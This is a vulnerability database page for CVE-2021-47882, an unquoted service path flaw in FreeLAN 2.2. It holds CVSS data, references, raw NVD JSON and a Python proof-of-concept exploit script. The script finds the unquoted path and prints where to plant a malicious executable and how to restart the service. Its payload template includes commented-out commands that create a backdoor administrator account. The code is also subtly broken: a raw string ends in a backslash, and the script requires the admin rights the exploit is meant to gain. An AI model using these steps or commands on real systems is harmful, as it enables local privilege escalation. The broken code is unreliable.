CVE-2021-47882

Description

FreeLAN 2.2 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with elevated LocalSystem privileges during service startup.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

FreeLAN 2.2 及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2021-47882 PoC - FreeLAN 2.2 Unquoted Service Path Exploitation
This script demonstrates the unquoted service path vulnerability in FreeLAN 2.2
Author: Security Researcher
Date: 2024
"""

import os
import sys
import ctypes
import subprocess
import platform

def check_privileges():
    """Check if running with administrator privileges"""
    try:
        is_admin = ctypes.windll.shell32.IsUserAnAdmin()
        return is_admin != 0
    except:
        return False

def find_unquoted_path(service_name):
    """
    Query Windows registry to find unquoted service paths
    """
    try:
        import winreg
        key_path = r"SYSTEM\CurrentControlSet\Services\" + service_name
        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path)
        image_path, _ = winreg.QueryValueEx(key, "ImagePath")
        winreg.CloseKey(key)
        
        # Check if path contains spaces and is not quoted
        if ' ' in image_path and not image_path.startswith('"'):
            return image_path
        return None
    except:
        return None

def generate_payload():
    """
    Generate reverse shell payload (placeholder - replace with actual payload)
    """
    # This is a placeholder - in real exploitation, this would be a meterpreter
    # or other reverse shell executable named after the unquoted path segment
    payload_template = '''
    #include <windows.h>
    #include <stdio.h>
    
    int main() {{
        // Placeholder for malicious code
        // In real attack, this would execute privileged operations
        MessageBox(NULL, "FreeLAN Service Compromised", "CVE-2021-47882", MB_OK);
        
        // Example: Create admin user
        // system("net user attacker P@ssw0rd123 /add");
        // system("net localgroup Administrators attacker /add");
        
        return 0;
    }}
    '''
    return payload_template

def exploit(service_name, unquoted_path):
    """
    Exploit unquoted service path vulnerability
    """
    print(f"[*] Target Service: {service_name}")
    print(f"[*] Unquoted Path: {unquoted_path}")
    
    # Parse path segments
    path_parts = unquoted_path.strip('"').split('\\')
    
    print("[*] Analyzing path segments for exploitation...")
    for i, part in enumerate(path_parts):
        if ' ' in part and not part.endswith('.exe'):
            malicious_path = '\\'.join(path_parts[:i+1]) + '.exe'
            print(f"[!] Potential injection point: {malicious_path}")
            print(f"[*] To exploit: Place malicious executable at: {malicious_path}")
            print(f"[*] Then restart the service: sc stop {service_name} && sc start {service_name}")
            break

def main():
    print("=" * 60)
    print("CVE-2021-47882 - FreeLAN Unquoted Service Path Exploit")
    print("=" * 60)
    
    if platform.system() != 'Windows':
        print("[-] This exploit only works on Windows systems")
        sys.exit(1)
    
    if not check_privileges():
        print("[-] This script requires administrator privileges")
        print("[-] Run as Administrator and try again")
        sys.exit(1)
    
    # Target service name
    service_name = "freelan"
    
    # Find unquoted path
    unquoted_path = find_unquoted_path(service_name)
    
    if unquoted_path:
        print(f"[+] Found unquoted service path: {unquoted_path}")
        exploit(service_name, unquoted_path)
    else:
        print("[-] Service not found or path is properly quoted")
        print("[*] Manual verification: sc qc freelan")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47882
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47882
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47882/
[4] VulDB https://vuldb.com/cve/CVE-2021-47882
[5] https://github.com/freelan-developers/freelan
[6] https://www.exploit-db.com/exploits/49630
[7] https://www.vulncheck.com/advisories/freelan-freelan-service-unquoted-service-path

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47882", "sourceIdentifier": "[email protected]", "published": "2026-01-21T18:16:22.417", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "FreeLAN 2.2 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with elevated LocalSystem privileges during service startup."}, {"lang": "es", "value": "FreeLAN 2.2 contiene una vulnerabilidad de ruta de servicio sin comillas en la configuración de su servicio de Windows que permite a atacantes locales ejecutar código arbitrario. Los atacantes pueden explotar la ruta binaria sin comillas para inyectar ejecutables maliciosos que se iniciarán con privilegios elevados de LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://github.com/freelan-developers/freelan", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49630", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/freelan-freelan-service-unquoted-service-path", "source": "[email protected]"}]}}